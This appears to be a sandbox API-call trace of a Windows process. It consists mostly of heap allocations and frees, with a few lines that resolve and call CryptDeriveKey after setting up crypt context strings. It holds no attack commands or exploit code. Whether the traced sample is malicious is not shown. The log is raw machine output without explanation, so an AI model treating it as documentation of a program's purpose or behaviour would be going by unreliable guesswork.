(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0145.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0145.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0145.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0145.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0145.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0145.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0145.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0145.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0145.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0145.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0145.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0145.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0145.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0145.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0145.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0145.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0145.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0145.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0145.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0145.691] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0145.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0145.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0145.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0145.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0145.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0145.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0145.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0145.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0145.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0145.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0145.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0145.692] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0145.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0145.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0145.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bc0 [0145.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0145.692] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0145.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0145.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0145.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0145.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0145.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0145.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0145.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0145.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0145.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0145.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0145.693] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0145.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0145.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509e0 [0145.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0145.693] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0145.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0145.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0145.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0145.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0145.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0145.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0145.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0145.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0145.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0145.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0145.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0145.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0145.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0145.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0145.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0145.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0145.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0145.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0145.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0145.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0145.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0145.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0145.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0145.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0145.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0145.695] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0145.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0145.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0145.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0145.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0145.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0145.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0145.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0145.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0145.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0145.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0145.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0145.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0145.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0145.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0145.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0145.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0145.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0145.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0145.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0145.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0145.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0145.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0145.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0145.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0145.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0145.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0145.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0145.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0145.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0145.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0145.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0145.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0145.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0145.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0145.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0145.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0145.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0145.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0145.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0145.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0145.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0145.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0145.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0145.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0145.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0145.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0145.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0145.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0145.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0145.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0145.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0145.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0145.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50b78 [0145.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50b78, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0145.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0145.698] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0145.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0145.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0145.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0145.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0145.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0145.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0145.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0145.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0145.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0145.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0145.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0145.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0145.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0145.699] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87410) returned 1 [0145.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0145.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0145.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 